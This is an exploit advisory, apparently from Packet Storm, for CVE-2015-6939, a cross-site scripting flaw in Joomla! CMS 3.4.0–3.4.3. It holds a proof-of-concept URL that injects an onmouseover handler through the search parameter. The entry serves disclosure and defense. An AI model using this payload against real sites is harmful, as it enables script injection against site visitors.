Joomla! CMS versions 3.4.0 through 3.4.3 suffer from a cross site scripting vulnerability.
429b040ae8eb0d56c0cc95bcf56bcdba82a2542bbf15a63cc532bd9f86d1f58a# Exploit Title: Joomla! CMS 3.4.0-3.4.3 XSS Vulnerability
# Date: 2015-08-18
# Exploit Author: cfreer (byfreer@gmail.com) & 0keeteam
# Vendor Homepage: http://joomla.org
# Version: 3.4.0 through 3.4.3
# Tested on: Apache/2.4.7 (Win32)
# CVE : CVE-2015-6939
Description
Inadequate escaping leads to XSS vulnerability in login module.
Affected Installs
Joomla! CMS versions 3.4.0 through 3.4.3
POC:
http://localhost/joomla/index.php/?Itemid=11&option=com_search&searchword=%f6%22%20onmouseover%3dprompt(3312)%20//&task=search
=============================
Reported Date: 2015-August-18
Fixed Date: 2015-September-08
=============================
referer:
http://developer.joomla.org/security-centre.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6939
https://github.com/poc-lab/exp/blob/master/CVE-2015-6939
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed